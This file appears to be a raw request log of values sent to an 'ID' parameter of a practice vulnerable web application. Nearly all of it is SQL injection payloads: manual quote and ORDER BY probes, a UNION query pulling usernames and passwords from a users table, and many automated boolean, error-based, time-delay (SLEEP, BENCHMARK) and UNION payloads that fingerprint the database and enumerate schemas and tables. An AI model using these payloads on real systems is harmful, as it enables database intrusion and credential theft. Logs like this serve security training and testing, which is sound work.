ID:1
ID:1 and 1=1
ID:1 and 1=2
ID:1'
ID:1' order by 3-- 
ID:1  order by 3-- 
ID:1  order by 4-- 
ID:1  order by 5-- 
ID:1'\ order by 5-- 
ID:1' order by 5-- 
ID:1'
ID:1
ID:1 and 1=2
ID:1' order by 3-- 
ID:1'
ID:1'
ID:1
ID:1'
ID:1')  order by 3 -- 
ID:1')  order by 4-- 
ID:1'  order by 4-- 
ID:1
ID:1'
ID:1 and 1=2
ID:1' order by 3-- 
ID:1'） order by 3-- 
ID:1') order by 3-- 
ID:1') order by 3-- 
ID:1') order by 4-- 
ID:1
ID:1\
ID:1
ID:1
ID:1
ID:1
ID:5942
ID:1"((,.((,)'
ID:1'essRYf<'">XAWGZK
ID:1) AND 3805=8155 AND (8080=8080
ID:1) AND 5401=5401 AND (9142=9142
ID:1 AND 6353=2669
ID:1 AND 5401=5401
ID:1 AND 4342=1940-- rJlr
ID:1 AND 5401=5401-- lGyC
ID:1') AND 6849=5713 AND ('uctH'='uctH
ID:1') AND 5401=5401 AND ('CfQp'='CfQp
ID:1') AND 9368=3540 AND ('robO'='robO
ID:(SELECT CONCAT(CONCAT(0x7176707071,(CASE WHEN (6573=6573) THEN 0x31 ELSE 0x30 END)),0x716a6a7071))
ID:1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176707071,(SELECT (ELT(2987=2987,1))),0x716a6a7071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('IFmh'='IFmh
ID:1') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176707071,(SELECT (ELT(8045=8045,1))),0x716a6a7071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('aFCR'='aFCR
ID:1') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176707071,(SELECT (ELT(2987=2987,1))),0x716a6a7071,0x78))x)) AND ('hyZu'='hyZu
ID:1') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176707071,(SELECT (ELT(9666=9666,1))),0x716a6a7071,0x78))x)) AND ('wrlK'='wrlK
ID:1') AND GTID_SUBSET(CONCAT(0x7176707071,(SELECT (ELT(6824=6824,1))),0x716a6a7071),6824) AND ('YmLA'='YmLA
ID:(SELECT CONCAT(0x7176707071,(ELT(2457=2457,1)),0x716a6a7071))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1');SELECT SLEEP(5)#
ID:1');SELECT SLEEP(5) AND ('bEiG'='bEiG
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))gUdl)#
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))tzMF) AND ('MtVw'='MtVw
ID:1');SELECT BENCHMARK(5000000,MD5(0x707a444f))#
ID:1');SELECT BENCHMARK(5000000,MD5(0x4a416462)) AND ('bKVo'='bKVo
ID:1') AND (SELECT 3425 FROM (SELECT(SLEEP(5)))YZDl) AND ('xgko'='xgko
ID:1') AND (SELECT 3425 FROM (SELECT(SLEEP(0)))YZDl) AND ('xgko'='xgko
ID:1') AND (SELECT 3425 FROM (SELECT(SLEEP(5)))YZDl) AND ('xgko'='xgko
ID:1') ORDER BY 1-- -
ID:1') ORDER BY 1059-- -
ID:1') ORDER BY 10-- -
ID:1') ORDER BY 6-- -
ID:1') ORDER BY 4-- -
ID:1') ORDER BY 3-- -
ID:1') UNION ALL SELECT CONCAT(0x7176707071,0x79436459546f48667073776845556b52484467754b706f744c756f475558444f78497653794b5679,0x716a6a7071),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,0x486f634c46644f6364657a4e534c75685847614b74574c496f46747457684c5556536941654c645a,0x716a6a7071)-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7176707071,0x6772687a744e754674454165674a5a7478416e48506a754f70615a6477465846674e744f55787062,0x716a6a7071),NULL-- -
ID:1') UNION ALL SELECT CONCAT(0x7176707071,0x6a5571444671764d6d6a,0x716a6a7071),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,0x43767967577172574764,0x716a6a7071)-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7176707071,0x456f534c65716955676f,0x716a6a7071),NULL-- -
ID:-6119') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,0x517a6774736651636f557475676f42776e437564634a5365727865585a6c6b51794d45517a4f7953,0x716a6a7071)-- -
ID:-1888') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (7168=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7168) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-8722') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-6415') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-9124') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-2029') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-3182') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-6658') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a6a7071)-- -
ID:-9508') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,JSON_ARRAYAGG(CONCAT_WS(0x73706f627772,schema_name)),0x716a6a7071) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:-2804') UNION ALL SELECT NULL,NULL,CONCAT(0x7176707071,JSON_ARRAYAGG(CONCAT_WS(0x73706f627772,table_schema,table_name)),0x716a6a7071) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479,0x6368616c6c656e676573,0x64767761,0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c,0x706572666f726d616e63655f736368656d61,0x70696b61636875,0x737973)-- -
ID:1
ID:1
ID:1 and 1=2
ID:1 and 1=2
ID:1 and 1=2
ID:1'
ID:1 and 1=2
ID:1'
ID:1' -- 
ID:1'
ID:1')-- 
ID:1') -- 
ID:1') order by 3 -- 
ID:-1') order by 3 -- 
ID:-1') union select 1, group_concat(username), group_concat(password) from security.users -- 
ID:1
ID:1
ID:1
ID:6304
ID:1..',.(((("
ID:1'ZPHTKI<'">nVBfMZ
ID:1) AND 2464=4216 AND (9931=9931
ID:1) AND 2328=2328 AND (2905=2905
ID:1 AND 5942=9138
ID:1 AND 2328=2328
ID:1 AND 1618=5286-- Qito
ID:1 AND 2328=2328-- BGMV
ID:1') AND 2637=7339 AND ('YrjL'='YrjL
ID:1') AND 2328=2328 AND ('DEKl'='DEKl
ID:1') AND 2684=7014 AND ('upjJ'='upjJ
ID:(SELECT CONCAT(CONCAT(0x7170707071,(CASE WHEN (2391=2391) THEN 0x31 ELSE 0x30 END)),0x7162706b71))
ID:1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707071,(SELECT (ELT(5421=5421,1))),0x7162706b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('xpSZ'='xpSZ
ID:1') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170707071,(SELECT (ELT(5412=5412,1))),0x7162706b71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('dijJ'='dijJ
ID:1') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7170707071,(SELECT (ELT(1755=1755,1))),0x7162706b71,0x78))x)) AND ('eQFl'='eQFl
ID:1') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7170707071,(SELECT (ELT(7195=7195,1))),0x7162706b71,0x78))x)) AND ('ovte'='ovte
ID:1') AND GTID_SUBSET(CONCAT(0x7170707071,(SELECT (ELT(5809=5809,1))),0x7162706b71),5809) AND ('MFLn'='MFLn
ID:(SELECT CONCAT(0x7170707071,(ELT(1402=1402,1)),0x7162706b71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1');SELECT SLEEP(5)#
ID:1');SELECT SLEEP(5) AND ('RGJV'='RGJV
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))XpEb)#
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))jZlq) AND ('vkmT'='vkmT
ID:1');SELECT BENCHMARK(5000000,MD5(0x57786d69))#
ID:1');SELECT BENCHMARK(5000000,MD5(0x69656345)) AND ('Qukc'='Qukc
ID:1') AND (SELECT 6158 FROM (SELECT(SLEEP(5)))gOWn) AND ('PhTT'='PhTT
ID:1') AND (SELECT 6158 FROM (SELECT(SLEEP(0)))gOWn) AND ('PhTT'='PhTT
ID:1') AND (SELECT 6158 FROM (SELECT(SLEEP(5)))gOWn) AND ('PhTT'='PhTT
ID:1') ORDER BY 1-- -
ID:1') ORDER BY 9790-- -
ID:1') ORDER BY 10-- -
ID:1') ORDER BY 6-- -
ID:1') ORDER BY 4-- -
ID:1') ORDER BY 3-- -
ID:1') UNION ALL SELECT CONCAT(0x7170707071,0x6573484671457a4156726a707a45564859556d707a57684a496f62425a75784a7165664e63504e71,0x7162706b71),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7170707071,0x5a5954576c614e584d797068767241446c72536158684f485345574246454257654b6b4b53705071,0x7162706b71),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7170707071,0x6f62766f63784b6b5775545349446263686e6b58786c484b4a69676872414477426d786767586274,0x7162706b71)-- -
ID:1') UNION ALL SELECT CONCAT(0x7170707071,0x7a776a734f7242434348,0x7162706b71),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7170707071,0x764978696b5246794b4d,0x7162706b71),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7170707071,0x74436e446a416a616964,0x7162706b71)-- -
ID:-4186') UNION ALL SELECT CONCAT(0x7170707071,0x734b68626d466647446c70764267434743555861766854744867597466427074567a706f58584a41,0x7162706b71),NULL,NULL-- -
ID:-7135') UNION ALL SELECT NULL,CONCAT(0x7170707071,0x45776943696d6c7659437563684b5548616c6c57616769656449654869747462515168445a716e63,0x7162706b71),NULL-- -
ID:-1849') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (6053=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6053) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-7242') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-9118') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-9245') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-4434') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-5548') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-1139') UNION ALL SELECT NULL,CONCAT(0x7170707071,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7162706b71),NULL-- -
ID:-2380') UNION ALL SELECT NULL,CONCAT(0x7170707071,JSON_ARRAYAGG(CONCAT_WS(0x6e6d627a7263,schema_name)),0x7162706b71),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:
ID:b8e5eb9068cced"
ID:abfffb518e18)
ID:fed0083a4f86359f'
ID:
ID:4be59e88'
ID:d4a1b2a84ff326"
ID:d990a973f10e20)
ID:
ID:1254c4be8a)
ID:c4282b8563c2'
ID:67c1c9e3c1"
ID:
ID:45e88b2f3c8445"
ID:a4679678a79b6a58'
ID:1ed3c50b83b1f0)
ID:
ID:af4bfa8b'
ID:1ef8a551115a00)
ID:d0dcd14606154a"
ID:
ID:33eb43f6"
ID:ef54cf6a'
ID:37483176ebe681f4)
ID:
ID:8d49185467)
ID:1df374b79c9fd7"
ID:a3e472e53e8fe0'
ID:
ID:02fc98a1b7'
ID:de0b63014e49de"
ID:69718787c6bd)
ID:1
ID:1
ID:1
ID:3569
ID:1,"()((.',,
ID:1'pdQQEm<'">WDkAvo
ID:1) AND 9834=4735 AND (4685=4685
ID:1) AND 8189=8189 AND (9135=9135
ID:1 AND 3033=8334
ID:1 AND 8189=8189
ID:1 AND 6212=2058-- NVSc
ID:1 AND 8189=8189-- DStj
ID:1') AND 3644=2810 AND ('CAaE'='CAaE
ID:1') AND 8189=8189 AND ('msvP'='msvP
ID:1') AND 1545=1808 AND ('pxhY'='pxhY
ID:(SELECT CONCAT(CONCAT(0x7176786b71,(CASE WHEN (3562=3562) THEN 0x31 ELSE 0x30 END)),0x716b707a71))
ID:1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786b71,(SELECT (ELT(9476=9476,1))),0x716b707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('zZLG'='zZLG
ID:1') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176786b71,(SELECT (ELT(3326=3326,1))),0x716b707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('yRVV'='yRVV
ID:1') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176786b71,(SELECT (ELT(2281=2281,1))),0x716b707a71,0x78))x)) AND ('jCpO'='jCpO
ID:1') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176786b71,(SELECT (ELT(7936=7936,1))),0x716b707a71,0x78))x)) AND ('SvCA'='SvCA
ID:1') AND GTID_SUBSET(CONCAT(0x7176786b71,(SELECT (ELT(5362=5362,1))),0x716b707a71),5362) AND ('vKcm'='vKcm
ID:(SELECT CONCAT(0x7176786b71,(ELT(2579=2579,1)),0x716b707a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1');SELECT SLEEP(5)#
ID:1');SELECT SLEEP(5) AND ('BsQQ'='BsQQ
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))sUvI)#
ID:1');(SELECT * FROM (SELECT(SLEEP(5)))QXJg) AND ('sACE'='sACE
ID:1');SELECT BENCHMARK(5000000,MD5(0x524b6742))#
ID:1');SELECT BENCHMARK(5000000,MD5(0x53476346)) AND ('cjVP'='cjVP
ID:1') AND (SELECT 8487 FROM (SELECT(SLEEP(5)))szBe) AND ('lRqE'='lRqE
ID:1') AND (SELECT 8487 FROM (SELECT(SLEEP(0)))szBe) AND ('lRqE'='lRqE
ID:1') AND (SELECT 8487 FROM (SELECT(SLEEP(5)))szBe) AND ('lRqE'='lRqE
ID:1') ORDER BY 1-- -
ID:1') ORDER BY 1099-- -
ID:1') ORDER BY 10-- -
ID:1') ORDER BY 6-- -
ID:1') ORDER BY 4-- -
ID:1') ORDER BY 3-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7176786b71,0x6b6d5748736278644e504353584d4d5543417855474166734c42495869635545504c796341795544,0x716b707a71),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,0x6d6d666f4c6e694a484463466a64704772726f7576757147526e6468685972486463546779444364,0x716b707a71)-- -
ID:1') UNION ALL SELECT CONCAT(0x7176786b71,0x47724c4a4b796e465a76666d626f586f736147646179746a504a676c7478496b4f4b58494f6e6848,0x716b707a71),NULL,NULL-- -
ID:1') UNION ALL SELECT NULL,CONCAT(0x7176786b71,0x514374547466554b6675,0x716b707a71),NULL-- -
ID:1') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,0x71446766517549696141,0x716b707a71)-- -
ID:1') UNION ALL SELECT CONCAT(0x7176786b71,0x5a4d4f4273734a4f7675,0x716b707a71),NULL,NULL-- -
ID:-4513') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,0x74544578417463786f4570554a587a4c7456726b6f64426f6466486c455a664e4b797a4c44574377,0x716b707a71)-- -
ID:-8845') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (8691=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8691) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-5135') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-7924') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-3557') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-4808') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-9303') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-3988') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716b707a71)-- -
ID:-3700') UNION ALL SELECT NULL,NULL,CONCAT(0x7176786b71,JSON_ARRAYAGG(CONCAT_WS(0x6f75766a7379,schema_name)),0x716b707a71) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:1
